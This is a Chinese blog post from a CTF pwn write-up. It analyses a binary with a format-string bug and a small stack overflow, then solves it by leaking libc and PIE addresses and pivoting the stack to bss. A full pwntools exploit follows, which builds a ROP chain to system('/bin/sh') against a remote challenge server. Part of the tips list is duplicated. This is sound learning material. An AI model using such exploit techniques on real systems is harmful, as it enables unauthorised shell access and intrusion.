栈的小复习:

最新推荐文章于 2023-04-26 19:57:58 发布
最新推荐文章于 2023-04-26 19:57:58 发布
阅读量318 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yms0211/article/details/124852731
版权

栈的小复习:

这一次以一道简洁的栈题来回顾一下前面栈的知识与应用:

格式化字符串与栈迁移:

首先看一下题目的保护:

在这里插入图片描述

除了canary都开了,其实对我们后面栈溢出时的操作是比较友好的。

静态分析:

然后我们进入IDA看一下反编译的伪代码:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  sub_7DA(a1, a2, a3);
  sub_83B();
  return 0LL;
}

main函数非常简单,只有两个函数,第一个函数是用来创建输入和输出空间的。所以我们主要看第二个函数:

int sub_83B()
{
  char buf[80]; // [rsp+0h] [rbp-50h] BYREF

  puts(">>>");
  read(0, buf, 0x60uLL);
  return printf(buf);
}

也非常简单,一个栈溢出和一个格式化字符串漏洞。

思路整理:

  1. 这题没有判定点,所以这个格式化字符串应该是用来泄露某些地址的
  2. 由于这道题里面的栈溢出只有0x10个字节并且开了堆栈不可执行,所以需要栈迁移到bss段上面去。

确定需要泄露的位置:

先进入gdb看一下栈里面内容:

在这里插入图片描述

可以看见参数被放进栈中的第一个位置,但是这道题我们需要进行ROP,所以我们要先进行libc基址的泄露。观察可以看见rbp指针下面有一个__libc_start_main+240,这个其实是libc中的 _libc_start_main 这个函数地址加了240的偏移,所以我们可以通过"%19$p"泄露这个地址来泄露libc的基址。

这里提一下怎么找格式化字符所在的位数,由于这是一个64位的程序,所以前六个参数不是在栈上的,那么我们在栈上数个数的时候是从6开始数的,所以这里__libc_star_main就是在第19个参数的位置上。

然后就是对于程序运行基址的泄露。由于这道题是开了PIE的,所以我们需要对运行基址进行泄露,由于PIE技术的缺陷,程序地址的末三位是不变的,所以我们可以将__libc_start_main+240的上一个地址,也就是:0x5555555548a0泄露出来然后减去8a0的末三位地址偏移就可以得到本次程序运行的基址了。

构造ROP链:

在前面观察静态反编译的程序可以知道这个程序的输入操作是只执行一次的,所以我们要截断程序的结束操作让我们的ROP链能正常进行。但最开始在不知道程序基址的情况下我们只能通过篡改原程序返回地址方式的方式来控制程序的执行流。

我们知道程序运行地址的末三位是不变的,结合IDA中的反汇编代码,我们可以观察到main函数和sub_83B()这个函数只有末两位是不一样的,那么我们就可以通过修改程序返回地址的末两位来让程序在执行一遍sub_83B()。这样我们就可以多次输入并形成完整的ROP链了。

栈迁移:

这里还是再提一下栈迁移这个技巧。简单来说,栈迁移就是连续调用两次 leave_ret 指令来控制 rbp,使其变为我们需要构造 fake_stack的地址(比如bss段)。

第一次调用leave_ret是栈帧本身的leave_ret,第二次调用leave_ret是在ROP链当中,这一点结合后面的exp很容易就能理解了

exp:

from pwn import *
from LibcSearcher import *

context_level = 'debug'

io = remote("47.108.155.185", 9129)
#io = process("./ezformat")
elf = ELF("./ezformat")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

payload1 = b'%19$p%18$p'
payload1 = payload1.ljust(0x58, b'a') + p8(0x91) #这里返回0x91是为了清空子函数的栈空间

io.recvuntil(">>>\n")
io.send(payload1)
io.recvuntil("0x")
libc_start = int(io.recv(12), base = 16) - 240
#libc_base = int(io.recv(12), base = 16) - 240 -libc.symbols['__libc_start_main']

print(hex(libc_start))

'''
sys_addr = libc_base + libc.symbols['system']
sh_addr = libc_base + libc.search(b"/bin/sh").__next__()
'''
libc = LibcSearcher('__libc_start_main', libc_start)
base = libc_start - libc.dump("__libc_start_main")
sys_addr = base+libc.dump("system")
sh_addr = base+libc.dump("str_bin_sh")

io.recvuntil("0x")
process_base = int(io.recv(12), base = 16) - 0x8a0

print(hex(process_base))

bss = elf.bss()  + 0x300 + process_base

rdi_addr = process_base + 0x903
leave_ret = process_base + 0x87c
payload2 = p64(rdi_addr) + p64(sh_addr) + p64(sys_addr)
payload2 = payload2.ljust(0x50, b'a') + p64(bss - 0x58) + p64(leave_ret)
payload3 = b'a'*0x50 + p64(bss) + p64(process_base + 0x843)

io.recvuntil(">>>\n")
io.send(payload3)
io.recvuntil(">>>\n")
io.send(payload2)

io.interactive()

tips:

因为有段时间没做栈题了,所以有些操作的细节都忘了,这里记录一下这次遇到的几个操作问题:

  1. 首先是这个格式化字符串泄露出来的地址是14位的,因为$p泄露出来的地址有“0x”这两个字符。

  2. __libc_start_main这个也是libc里面的函数,也是可以用来泄露libc基址的
    细节都忘了,这里记录一下这次遇到的几个操作问题:

  3. 首先是这个格式化字符串泄露出来的地址是14位的,因为$p泄露出来的地址有“0x”这两个字符。

  4. __libc_start_main这个也是libc里面的函数,也是可以用来泄露libc基址的

  5. 栈迁移的之前要确保栈空间正常,栈里面不能有其他垃圾数据,不然会失败

youngmith
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[XCTF-Reverse] 83 2019_UNCTF_easyvm
weixin_52640415的博客
03-28 467
到了后边就都不会了,只有这个VM还可以磨磨 主程序非常短,输入32个字节然后就去比较了 signed __int64 __fastcall main(__int64 a1, char **a2, char **a3) { unsigned int (__fastcall ***v3)(_QWORD, void *, void *, char *); // rbx char s; // [rsp+10h] [rbp-80h] int v6; // [rsp+70h] [rbp-20h]
好好说话之64位格式化字符串漏洞
hollk’s blog
08-06 2874
64位格式化字符串和32位的很相似,做题的步骤也相同,唯一不同的是64位程序对函数参数存储的方式和32位的不同。64为程序会优先将函数的前6个参数放置在寄存器中,超过6个的再存放在上,而32位直接存放在上。寄存器存放顺序可以看我之前写的好好说话之ret2csu 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ 例题选自2017-UIUCTF-pwn200-GoodLuck checksec搞一下 64位程序,开启了NX保护、Canary。因为我们知道这是一道格式化字符串的题
HDCTF KEEP ON
最新发布
红叶的博客
04-26 676
我们将Payload填充到0x50大小,因为0x50是s的大小。剩下的0x10则是我们的RBP与Leave, Return指令。然后就是我们的/bin/sh地址。rbp与s的距离为0x60,再减去0x08的返回地址,就得到了我们的目标迁移地址。我们首先将binsh的地址送入rdi寄存器中,然后再继续接下来的操作。这样我们就得到了我们的目标地址,可以开始构建我们的Payload了。来将/bin/sh的地址pop进中作为system函数的参数。我们只有0x60的大小构建Payload。
BUUCTF迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1011
1.checksec+运行获取基本信息 32位+NX堆不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
主题:论函数调用约定http://club.it.sohu.com/r-program-70112-0-0-0.html
www.pingfi.com
05-14 1026
 在C语言中,假设我们有这样的一个函数:        int function(int a,int b)        调用时只要用result = function(1,2)这样的方式就可以使用这个函数。但是,当高级语言被编译成计算机可以识别的机器码时,有一个问题就凸现出来:在CPU中,计算机没有办法知道一个函数调用需要多少个、什么样的参数,也没有硬件可以保存这些参数。也就是说,计算机不知道怎
Java技术有空复习复习
10-28
Java 技术是软件开发领域中不可或缺的一部分,尤其在互联网行业中,Java 以其稳定性、高效性和可扩展性成为后端开发的首选语言之一。针对Java工程师的面试,常常会涉及多个技术领域的知识,包括但不限于Java核心、...
NOIP提高组初赛复习3_.pdf
08-26
在NOIP提高组初赛复习3_中,提供了的概念、顺序存储、基本操作等内容,并提供了一些小练习,例如的概念、顺序存储、进操作等。通过这些内容,可以帮助读者更好地理解的概念和应用。 在的实现中,...
2019春招复习笔记之Java技术.rar
05-15
这份压缩文件算是放在CSDN上面的一份备份文件吧,希望自己秋招的时候能够自己拿出来再回顾一下,帮助自己找到最心仪的工作。也是春招过程中积累下来的资源,关于详情也在这篇博客中记录了...
04-课程复习:第01周的复习、答疑、补充.rar
09-02
在本课程复习资料“04-课程复习:第01周的复习、答疑、补充.rar”中,我们聚焦于第一周的学习内容,旨在巩固学员的基础知识,解答他们在学习过程中遇到的疑惑,并提供额外的补充材料以深化理解。这份压缩包包含了一...
review:复习总结
03-15
10. **JVM(Java虚拟机)**:了解JVM的工作原理,包括类加载机制、内存模型(堆、、方法区等)、垃圾回收机制,有助于优化代码性能。 11. **设计模式**:设计模式是解决软件设计中常见问题的经验总结,如单例模式...
Linux pwn入门教程——格式化字符串漏洞
dfdhxb995397的博客
07-18 381
本文作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42943-1-1.html 0×00 printf函数中的漏洞printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用,例如 然而,有时候为了省事也会写成 事实上,这是一种非常...
axb-2019-fmt64
Stella_Leo的博客
08-24 671
格式化字符串,讲点不一样的 64位格式化字符串学习 题目来自2019安洵杯。 这个漏洞原理很简单,就是简单的格式化字符串漏洞,泄露和劫持got表。但是64位呢,和32位有一点点不一样的地方,在这里强调和学习记录一下 直接把我坑傻了顺便学习一下libcsearcher的用法 [*] '/home/l/Desktop/AD/axb_2019_fmt64' Arch: amd64-64-little RELRO: Partial RELRO Stack: No cana
64位longlong格式化字符串
xiuzhentianting的博客
09-07 3567
// windows void CtestDlg::OnBnClickedButton1() { __int64 i = 2200000000; TCHAR szDescribe[256]=TEXT(""); _snprintf(szDescribe,sizeof(szDescribe),TEXT("%I64d"),i); AfxMessageBox(szDescribe);
格式化字符串漏洞利用
qq_42192672的博客
10-25 3806
学习资料: https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_exploit/                        https://veritas501.space/2017/04/28/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E...
buuctf gyctf_2020_borrowstack(迁移)和r2t4,axb_2019_fmt32(格式化字符串和fmtstr_payload工具的使用)
carol2358的博客
05-24 1335
头痛,之前学的漏洞好多,只学了相关知识没有做题,真正碰到题目就不会了,真的头痛 gyctf_2020_borrowstack 迁移 payload设置 此种攻击方法的关键在于如何同时控制ebp和eip,那么如何同时控制ebp和eip的值的? 1、使用ROPgadget查找leave;ret指令所在的地址 2、覆盖完成bufer后,使用可控制的地址覆盖ebp的值,使用上述leave;ret指令所在地址覆盖ret的值。 程序运行(32位,64位同理): 1、当函数正常返回时,执行leave;re
格式化字符串在bss段上的处理
playmaker的博客
06-19 2589
格式化字符串在bss段上的内容处理 先查看程序保护,保护全开 拿到程序一眼就看到了格式化字符串的漏洞 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [esp+0h] [ebp-10h] unsigned int v6; // [esp+4h]...
JavaWeb复习:J2EE选择题集锦
这些题目覆盖了Java基础、J2EE企业级开发、Web应用开发等多个重要概念,对于深入理解Java技术,尤其是J2EE部分有很好的复习效果。学习者可以通过解答这些题目来巩固和检验自己的知识掌握程度。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值